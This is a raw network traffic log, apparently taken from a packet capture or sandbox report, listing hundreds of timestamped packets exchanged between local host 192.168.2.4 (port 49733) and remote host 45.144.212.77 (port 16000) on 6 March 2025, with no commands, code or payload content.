Mar 6, 2025 08:09:12.286052942 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.286082029 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.286473036 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.286530018 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.286545038 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.286576986 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.286601067 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.286612988 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.286644936 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.286711931 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.286724091 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.286736012 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.286755085 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.286780119 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.286854029 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.286864996 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.286875963 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.286887884 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.286907911 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.286920071 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.287451029 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.287462950 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.287473917 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.287499905 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.287543058 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.287554979 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.287564993 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.287576914 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.287586927 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.287612915 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.287784100 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.287796021 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.287806988 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.287821054 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.287831068 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.287832975 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.287859917 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.287880898 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.288357973 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.288368940 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.288379908 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.288412094 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.288454056 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.288465023 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.288476944 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.288490057 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.288511992 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.288588047 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.288599014 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.288609028 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.288621902 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.288639069 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.288662910 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.288734913 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.288747072 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.288805008 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.289238930 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.289251089 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.289262056 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.289292097 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.289360046 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.289371967 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.289386034 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.289397955 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.289410114 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.289443970 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.289506912 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.289526939 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.289539099 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.289549112 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.289551020 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.289563894 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.289580107 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.289609909 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.290167093 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.290178061 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.290190935 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.290211916 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.290239096 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.290250063 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.290262938 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.290275097 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.290277004 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.290309906 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.290332079 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.290383101 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.298742056 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.383919954 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.383949995 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.383963108 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.383976936 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.383997917 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.384008884 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.384021044 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.384032965 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.384061098 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.384093046 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.384150982 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.384161949 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.384174109 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.384192944 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.384206057 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.384213924 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.384223938 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.384236097 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.384248018 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.384267092 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.384510040 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.384532928 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.384547949 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.384557009 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.384558916 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.384572983 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.384589911 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.384618044 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.384673119 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.384684086 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.384695053 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.384706974 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.384743929 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.384815931 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.384848118 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.384860039 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.384886980 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.384983063 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.384994984 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.385006905 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.385019064 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.385030031 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.385061979 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.385138035 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.385149002 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.385160923 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.385183096 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.385198116 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.385256052 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.385267973 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.385303974 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.386266947 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.386280060 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.386291981 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.386326075 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.386396885 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.386408091 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.386419058 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.386430979 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.386437893 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.386482000 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.386537075 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.386548042 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.386559010 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.386569977 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.386578083 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.386583090 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.386621952 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.386646986 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.386780024 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.386791945 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.386802912 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.386816025 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.386826992 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.386837006 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.386837959 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.386856079 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.386892080 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.387067080 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.387078047 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.387088060 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.387099028 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.387109995 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.387121916 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.387123108 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.387140036 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.387156010 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.387413979 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.387424946 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.387435913 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.387461901 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.387501001 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.387512922 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.387525082 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.387536049 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.387552023 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.387583017 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.387705088 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.387716055 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.387727022 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.387737989 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.387748003 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.387749910 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.387763977 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.387799978 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.388375998 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.388422966 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.388434887 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.388465881 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.388470888 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.388494015 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.388556957 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.388567924 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.388578892 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.388592958 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.388618946 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.388643980 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.388695002 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.388755083 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.388772964 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.388786077 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.388797045 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.388823986 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.391001940 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.391016006 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.391027927 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.391057968 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.391093016 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.391103983 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.391117096 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.391139984 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.391163111 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.391223907 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.391237974 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.391248941 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.391262054 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.391273022 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.391274929 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.391280890 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.391325951 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.391460896 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.391482115 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.391494036 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.391505957 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.391518116 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.391526937 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.391527891 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.391545057 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.391556978 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.391556978 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.391567945 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.391571999 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.391582012 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.391606092 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.391632080 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.391738892 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.391752005 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.391788006 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.391813993 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.391825914 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.391838074 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.391884089 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.395107031 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.466164112 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.466181993 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.466193914 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.466269016 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.466279984 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.466291904 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.466304064 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.466316938 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.466329098 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.466341019 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.466363907 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.466381073 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.466423988 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.466434956 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.466474056 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.466499090 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.466509104 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.466520071 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.466531038 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.466543913 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.466547012 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.466569901 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.466604948 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.466648102 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.479767084 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.479830027 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.479840994 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.479876041 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.479909897 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.479922056 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.479939938 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.479962111 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.479964972 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.479988098 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.480005026 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.480051994 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.480082989 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.480159044 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.480178118 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.480187893 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.480211020 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.480232000 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.480241060 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.480309963 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.480321884 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.480349064 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.480372906 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.480386019 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.480397940 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.480429888 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.480453968 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.480523109 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.480534077 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.480545998 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.480556965 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.480577946 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.480607033 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.480634928 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.480639935 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.480645895 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.480698109 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.480741024 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.480752945 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.480765104 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.480777979 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.480788946 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.480789900 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.480803013 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.480819941 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.480842113 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.481025934 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.481044054 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.481055975 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.481066942 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.481079102 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.481089115 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.481092930 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.481101036 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.481126070 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.481276035 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.481287956 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.481301069 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.481313944 CET	16000	49733	45.144.212.77	192.168.2.4
